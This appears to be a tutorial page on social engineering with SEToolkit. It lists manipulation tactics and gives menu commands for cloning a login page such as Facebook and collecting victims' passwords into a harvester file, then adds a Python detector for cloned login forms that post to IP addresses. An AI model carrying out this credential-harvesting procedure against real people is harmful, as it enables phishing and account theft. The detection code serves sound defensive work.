
Social Engineering using SEToolkit

Humans are the weakest link in any system. Exploiting them as an initial attack vector is called social engineering. Much information can be obtained with this technique. Social engineering is the art of extracting useful information using social or communication skills.


Acts such as dumpster diving, shoulder surfing, email spamming, sending fake emails and email bombing are also part of social engineering. It can be done better over the phone than in person. The steps followed in social engineering can be listed as:


  • Choose a victim

  • Impersonate someone high in position

  • Expression of urgency

  • Persuade the victim to help

  • Thank or appreciate profusely


Social Engineer Toolkit, also known as SET or SEToolkit, is the most advanced open source software designed to perform attacks against the weakest entity in the system, i.e. humans. It comes integrated with Kali Linux to perform social engineering attacks like phishing. Information about people can also be harvested from their virtual social life. Websites like www.pipl.com can find much information about people from their activity on social networking sites.


Deliverables:

In Kali Linux --> Terminal

~# setoolkit (Enter)

~# y (Enter)

Select (1) Social Engineering Attack

~# 1 (Enter)

Select (2) Website Attack Vectors

~# 2 (Enter)

Select (3) Credential Harvester Attack Method

~# 3 (Enter)

Select (2) Site Cloner

~# 2 (Enter)

Enter the IP address for the post back. Use your (the attacker’s, i.e. Kali Linux’s) IP address.

~# [Kali Linux IP address] (Enter)

Enter the URL to clone

Ex. ~# www.facebook.com (Enter)

Now open that IP address in the victim’s browser, enter the ID and password, and log in.

Those IDs and passwords can be seen in the /var/www/harvester.txt file in Kali Linux.
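
Seen from the defender's side, a cloned login page reached by IP address, as in the steps above, leaves a form whose password is submitted to an IP-literal host instead of the brand's domain. The following is an added example, not part of the original page or of SET, that flags such forms in fetched HTML; the function names and sample pages are constructed, and it assumes the clone is served from or posts to a bare IP address.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urljoin, urlparse

def is_ip_host(url):
    """True when the URL's host is a literal IP address rather than a name."""
    host = urlparse(url).hostname
    try:
        ip_address(host or "")
        return True
    except ValueError:
        return False

class LoginFormFinder(HTMLParser):
    """Collects the action of every <form> that contains a password input."""
    def __init__(self):
        super().__init__()
        self.in_form = False
        self.has_password = False
        self.action = ""
        self.actions = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.in_form, self.has_password = True, False
            self.action = attrs.get("action") or ""
        elif tag == "input" and self.in_form:
            if (attrs.get("type") or "").lower() == "password":
                self.has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self.in_form:
            if self.has_password:
                self.actions.append(self.action)
            self.in_form = False

def suspicious_login_targets(page_url, html):
    """Resolved form targets that would send a password to an IP-literal host."""
    finder = LoginFormFinder()
    finder.feed(html)
    finder.close()
    targets = [urljoin(page_url, a) for a in finder.actions]
    return [t for t in targets if is_ip_host(t)]

# Constructed samples (192.0.2.0/24 is a documentation range).
CLONE = '<form action="http://192.0.2.10/" method="post"><input name="email"><input type="password" name="pass"></form>'
LEGIT = '<form action="/login" method="post"><input type="password" name="pass"></form>'
print(suspicious_login_targets("http://192.0.2.10/", CLONE))
print(suspicious_login_targets("https://www.example.com/", LEGIT))
```

A mail gateway or web proxy can run the same check on pages behind links before users reach them; a hit is a reason to block or warn, since legitimate login pages are served from named hosts over HTTPS.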

